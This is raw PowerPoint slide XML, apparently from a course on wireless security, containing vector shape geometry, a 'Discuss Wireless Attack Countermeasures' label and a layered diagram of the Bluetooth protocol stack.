                <a:gd name="T35" fmla="*/ 121 h 195"/>
                <a:gd name="T36" fmla="*/ 42 w 111"/>
                <a:gd name="T37" fmla="*/ 154 h 195"/>
                <a:gd name="T38" fmla="*/ 55 w 111"/>
                <a:gd name="T39" fmla="*/ 164 h 195"/>
                <a:gd name="T40" fmla="*/ 56 w 111"/>
                <a:gd name="T41" fmla="*/ 164 h 195"/>
                <a:gd name="T42" fmla="*/ 69 w 111"/>
                <a:gd name="T43" fmla="*/ 155 h 195"/>
                <a:gd name="T44" fmla="*/ 74 w 111"/>
                <a:gd name="T45" fmla="*/ 121 h 195"/>
                <a:gd name="T46" fmla="*/ 74 w 111"/>
                <a:gd name="T47" fmla="*/ 7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1" h="195">
                  <a:moveTo>
                    <a:pt x="111" y="118"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="143"/>
                    <a:pt x="106" y="162"/>
                    <a:pt x="96" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="188"/>
                    <a:pt x="72" y="195"/>
                    <a:pt x="55" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="195"/>
                    <a:pt x="25" y="188"/>
                    <a:pt x="15" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="162"/>
                    <a:pt x="0" y="143"/>
                    <a:pt x="0" y="118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3"/>
                    <a:pt x="15" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="7"/>
                    <a:pt x="38" y="0"/>
                    <a:pt x="55" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="0"/>
                    <a:pt x="86" y="7"/>
                    <a:pt x="96" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="33"/>
                    <a:pt x="111" y="52"/>
                    <a:pt x="111" y="77"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="111" y="118"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="74" y="74"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="59"/>
                    <a:pt x="72" y="48"/>
                    <a:pt x="69" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="34"/>
                    <a:pt x="61" y="30"/>
                    <a:pt x="56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49" y="30"/>
                    <a:pt x="45" y="34"/>
                    <a:pt x="41" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="48"/>
                    <a:pt x="37" y="59"/>
                    <a:pt x="37" y="74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37" y="136"/>
                    <a:pt x="38" y="147"/>
                    <a:pt x="42" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="162"/>
                    <a:pt x="49" y="165"/>
                    <a:pt x="55" y="16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2" y="165"/>
                    <a:pt x="66" y="162"/>
                    <a:pt x="69" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="148"/>
                    <a:pt x="74" y="136"/>
                    <a:pt x="74" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="74" y="7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6" name="Freeform 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16B921BE-D4C1-4EC8-B06B-05D680FA9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846" y="5118310"/>
              <a:ext cx="140038" cy="243668"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 3 w 111"/>
                <a:gd name="T1" fmla="*/ 105 h 192"/>
                <a:gd name="T2" fmla="*/ 13 w 111"/>
                <a:gd name="T3" fmla="*/ 0 h 192"/>
                <a:gd name="T4" fmla="*/ 105 w 111"/>
                <a:gd name="T5" fmla="*/ 0 h 192"/>
                <a:gd name="T6" fmla="*/ 105 w 111"/>
                <a:gd name="T7" fmla="*/ 30 h 192"/>
                <a:gd name="T8" fmla="*/ 43 w 111"/>
                <a:gd name="T9" fmla="*/ 30 h 192"/>
                <a:gd name="T10" fmla="*/ 39 w 111"/>
                <a:gd name="T11" fmla="*/ 75 h 192"/>
                <a:gd name="T12" fmla="*/ 49 w 111"/>
                <a:gd name="T13" fmla="*/ 68 h 192"/>
                <a:gd name="T14" fmla="*/ 62 w 111"/>
                <a:gd name="T15" fmla="*/ 65 h 192"/>
                <a:gd name="T16" fmla="*/ 98 w 111"/>
                <a:gd name="T17" fmla="*/ 81 h 192"/>
                <a:gd name="T18" fmla="*/ 111 w 111"/>
                <a:gd name="T19" fmla="*/ 128 h 192"/>
                <a:gd name="T20" fmla="*/ 96 w 111"/>
                <a:gd name="T21" fmla="*/ 173 h 192"/>
                <a:gd name="T22" fmla="*/ 55 w 111"/>
                <a:gd name="T23" fmla="*/ 192 h 192"/>
                <a:gd name="T24" fmla="*/ 16 w 111"/>
                <a:gd name="T25" fmla="*/ 177 h 192"/>
                <a:gd name="T26" fmla="*/ 0 w 111"/>
                <a:gd name="T27" fmla="*/ 138 h 192"/>
                <a:gd name="T28" fmla="*/ 1 w 111"/>
                <a:gd name="T29" fmla="*/ 137 h 192"/>
                <a:gd name="T30" fmla="*/ 36 w 111"/>
                <a:gd name="T31" fmla="*/ 135 h 192"/>
                <a:gd name="T32" fmla="*/ 42 w 111"/>
                <a:gd name="T33" fmla="*/ 155 h 192"/>
                <a:gd name="T34" fmla="*/ 55 w 111"/>
                <a:gd name="T35" fmla="*/ 162 h 192"/>
                <a:gd name="T36" fmla="*/ 69 w 111"/>
                <a:gd name="T37" fmla="*/ 153 h 192"/>
                <a:gd name="T38" fmla="*/ 74 w 111"/>
                <a:gd name="T39" fmla="*/ 129 h 192"/>
                <a:gd name="T40" fmla="*/ 69 w 111"/>
                <a:gd name="T41" fmla="*/ 102 h 192"/>
                <a:gd name="T42" fmla="*/ 54 w 111"/>
                <a:gd name="T43" fmla="*/ 92 h 192"/>
                <a:gd name="T44" fmla="*/ 42 w 111"/>
                <a:gd name="T45" fmla="*/ 96 h 192"/>
                <a:gd name="T46" fmla="*/ 36 w 111"/>
                <a:gd name="T47" fmla="*/ 108 h 192"/>
                <a:gd name="T48" fmla="*/ 3 w 111"/>
                <a:gd name="T49" fmla="*/ 105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1" h="192">
                  <a:moveTo>
                    <a:pt x="3" y="105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39" y="75"/>
                    <a:pt x="39" y="75"/>
                    <a:pt x="39" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="72"/>
                    <a:pt x="45" y="70"/>
                    <a:pt x="49" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="66"/>
                    <a:pt x="57" y="65"/>
                    <a:pt x="62" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="65"/>
                    <a:pt x="89" y="70"/>
                    <a:pt x="98" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="92"/>
                    <a:pt x="111" y="108"/>
                    <a:pt x="111" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="146"/>
                    <a:pt x="106" y="161"/>
                    <a:pt x="96" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="186"/>
                    <a:pt x="73" y="192"/>
                    <a:pt x="55" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="192"/>
                    <a:pt x="27" y="187"/>
                    <a:pt x="16" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="168"/>
                    <a:pt x="0" y="154"/>
                    <a:pt x="0" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="137"/>
                    <a:pt x="1" y="137"/>
                    <a:pt x="1" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="135"/>
                    <a:pt x="36" y="135"/>
                    <a:pt x="36" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="144"/>
                    <a:pt x="38" y="150"/>
                    <a:pt x="42" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="160"/>
                    <a:pt x="50" y="162"/>
                    <a:pt x="55" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="162"/>
                    <a:pt x="66" y="159"/>
                    <a:pt x="69" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="147"/>
                    <a:pt x="74" y="139"/>
                    <a:pt x="74" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="117"/>
                    <a:pt x="72" y="109"/>
                    <a:pt x="69" y="102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="96"/>
                    <a:pt x="61" y="92"/>
                    <a:pt x="54" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="92"/>
                    <a:pt x="45" y="94"/>
                    <a:pt x="42" y="96"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="99"/>
                    <a:pt x="37" y="103"/>
                    <a:pt x="36" y="108"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3" y="10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958C8B45-68FD-4C11-8CCA-3AC65550BE94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-8709" y="4801020"/>
            <a:ext cx="2776992" cy="6697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 algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1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Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Discuss Wireless Attack Countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="60265587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6E5F9F4-6356-40FD-8EC9-80FFE90A7F67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141413" y="97242"/>
            <a:ext cx="9909175" cy="708804"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p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Bluetooth Stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="AutoShape 135"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7713421" y="4565986"/>
            <a:ext cx="3868979" cy="1579260"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8466"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="rnd" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="accent3">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 135"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7713421" y="1742066"/>
            <a:ext cx="3868979" cy="2124151"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8466"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="rnd" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="139AFF"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round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굴림" pitchFamily="50" charset="-127"/>
              <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Down Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8184172" y="1532706"/>
            <a:ext cx="172336" cy="1468774"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="7000">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff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Down Arrow 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8697894" y="1587062"/>
            <a:ext cx="172336" cy="1954939"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="7000">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff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" name="Down Arrow 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9210460" y="1577450"/>
            <a:ext cx="172336" cy="1468774"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="7000">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff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" name="Down Arrow 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9741498" y="1583946"/>
            <a:ext cx="172336" cy="1954939"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="7000">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff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" name="Down Arrow 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10318713" y="1573207"/>
            <a:ext cx="172336" cy="1954939"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="7000">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff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" name="Rounded Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8061388" y="1299364"/>
            <a:ext cx="2597468" cy="323240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Rounded Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8061388" y="1838857"/>
            <a:ext cx="417904" cy="862735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" name="Rounded Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8061388" y="2917847"/>
            <a:ext cx="1443038" cy="323240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" name="Rounded Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8061388" y="3457342"/>
            <a:ext cx="2597468" cy="323240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Rounded Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8061388" y="4118756"/>
            <a:ext cx="2597468" cy="323240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" name="Rounded Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8061388" y="4658251"/>
            <a:ext cx="2597468" cy="323240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" name="Rounded Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8061388" y="5197745"/>
            <a:ext cx="3347847" cy="323240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" name="Rounded Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8061388" y="5737242"/>
            <a:ext cx="3347847" cy="323240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" name="Rounded Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10762755" y="4658251"/>
            <a:ext cx="646481" cy="323240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" name="Rounded Rectangle 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9573692" y="2917847"/>
            <a:ext cx="507949" cy="323240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" name="Rounded Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10150907" y="2917847"/>
            <a:ext cx="507949" cy="323240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" name="Rounded Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8576264" y="1838857"/>
            <a:ext cx="415595" cy="323240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" name="Rounded Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9088831" y="1838857"/>
            <a:ext cx="415595" cy="323240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" name="Rounded Rectangle 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8576264" y="2378352"/>
            <a:ext cx="415595" cy="323240"/>
          </a:xfrm>
          <a:prstGeom prst="round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8836753" y="1317429"/>
            <a:ext cx="1046738" cy="3108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Application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8131376" y="1857790"/>
            <a:ext cx="290131" cy="839307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</a:t>
            </a:r>
            <a:b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</a:b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</a:t>
            </a:r>
            <a:b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</a:b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</a:t>
            </a:r>
            <a:b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</a:b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X</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectangle 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8514894" y="1878401"/>
            <a:ext cx="547556" cy="24868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TCP/IP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8548094" y="2404256"/>
            <a:ext cx="477938" cy="3108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PPP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8330776" y="2935912"/>
            <a:ext cx="904263" cy="3108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RFCOMM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Rectangle 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9608134" y="2927170"/>
            <a:ext cx="451581" cy="3108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TCS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rectangle 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10175605" y="2934038"/>
            <a:ext cx="484414" cy="3108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SDP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Rectangle 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9031297" y="3472772"/>
            <a:ext cx="657651" cy="3108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L2CAP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Rectangle 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9138963" y="4147561"/>
            <a:ext cx="442319" cy="3108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HCI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757032" y="4658251"/>
            <a:ext cx="1206180" cy="3108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Link Manager</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Rectangle 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10784371" y="4668990"/>
            <a:ext cx="633366" cy="3108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Audio</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Rectangle 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9274535" y="5210894"/>
            <a:ext cx="921554" cy="3108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Baseband</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Rectangle 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9031551" y="5757394"/>
            <a:ext cx="1407523" cy="3108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Bluetooth Radio</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Rectangle 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="7137633" y="5220401"/>
            <a:ext cx="1482711" cy="29531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Transport Protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Rectangle 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="6812596" y="2686118"/>
            <a:ext cx="2132785" cy="29531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Middleware Protocol Group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B4CEEFB6-0132-4A99-A76B-7B0F81517FC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9134766" y="1866244"/>
            <a:ext cx="345955" cy="279769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill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AT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Полилиния 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D12AFA9-98AB-42C5-B251-407B948EE197}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404535" y="1366396"/>
            <a:ext cx="3220004" cy="5200436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  <a:gd name="connsiteX7" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY7" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX8" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY8" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX9" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY9" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX10" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY10" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX11" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY11" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX12" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY12" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX13" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY13" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX14" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY14" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX15" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY15" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX16" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY16" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX17" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY17" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX18" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY18" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX19" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY19" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX20" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY20" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX21" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY21" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX22" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY22" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX23" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY23" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX24" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY24" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX25" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY25" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX26" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY26" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX27" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY27" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX28" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY28" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX29" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY29" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX30" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY30" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX31" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY31" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX32" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY32" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteX33" fmla="*/ 908 w 6953"/>
              <a:gd name="connsiteY33" fmla="*/ 908 w 6953"/>
